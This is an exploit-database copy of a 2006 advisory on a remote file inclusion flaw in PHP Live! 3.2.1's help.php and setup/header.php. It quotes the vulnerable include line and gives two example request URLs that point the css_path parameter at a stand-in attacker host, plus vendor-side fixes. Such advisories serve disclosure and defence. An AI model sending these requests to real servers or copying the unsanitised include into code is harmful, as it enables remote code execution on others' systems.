PHP Live! <= 3.2.1 (help.php) Remote Inclusion Vulnerability

2006-07-23T00:00:00
ID 1337DAY-ID-601
Type zdt
Reporter magnific
Modified 2006-07-23T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================================================
PHP Live! <= 3.2.1 (help.php) Remote Inclusion Vulnerability
============================================================



     Advisory: PHPLive 3.2 Remote Injection Vulnerability
 Release Date: 2006/07/23
       Author: magnific
   Discovered: aneurysm.inc security reserach
         Risk: High
Vendor Status: not contacted | no patch available
      Version: all

-----------
Overview:

Some variables are not properly sanitized before being used.
Here you will find the variables not properly sanitized:

-----------
Vulnerable code:

help.php /setup/header.php etc..

<? $css_path = ( !isset( $css_path ) ) ? $css_path = "./" : $css_path ; include_once( $css_path."css/default.php" ) ; ?>

-----------
Execution:

help.php?css_path=htt://attacker
setup/header.php?css_path=htt://attacker


-----------
Vendor:

At the moment, there are no solutions from the vendor. If you want to make
sure the code and your PHPLIVE you have to sanitize the variable $css_path,
in all files affecteds.
Active SAFE_MODE on server, for local security.

---------------------------




#  0day.today [2018-01-10]  #